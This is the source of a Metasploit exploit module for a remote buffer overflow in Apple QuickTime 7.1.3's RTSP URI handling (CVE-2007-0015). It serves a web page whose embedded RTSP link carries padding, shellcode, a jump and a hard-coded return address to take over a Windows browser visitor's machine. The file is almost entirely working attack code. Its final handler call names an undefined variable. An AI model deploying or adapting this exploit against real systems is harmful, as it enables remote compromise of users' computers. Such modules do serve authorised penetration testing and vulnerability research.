metasploit-framework/modules/exploits/windows/browser/apple_quicktime_rtsp.rb

79 lines
2.2 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Browser::Apple_Quicktime_RTSP < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was
inspired by MOAB-01-01-2007.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-0015' ],
[ 'BID', '21829' ],
[ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Apple QuickTime Player 7.1.3', { 'Ret' => 0x6855d8a2 } ], # xpsp2/2k3 :( | vista ;)
],
'Privileged' => false,
'DisclosureDate' => 'Jan 1 2007',
'DefaultTarget' => 0))
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
cruft = rand_text_english(4)
sploit = rand_text_english(307) + payload.encoded + "\xeb\x06" + rand_text_english(2)
sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')
content = "<?xml version=\"1.0\"?>" + "<?quicktime type=\"application/x-quicktime-media-link\"?>"
content << "<embed autoplay=\"true\" moviename=\"#{cruft}\" " + "qtnext=\"#{cruft}\" type=\"video/quicktime\" "
content << "src=\"rtsp://#{cruft}:#{sploit}\" />\n"
print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")
send_response(client, content, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end
end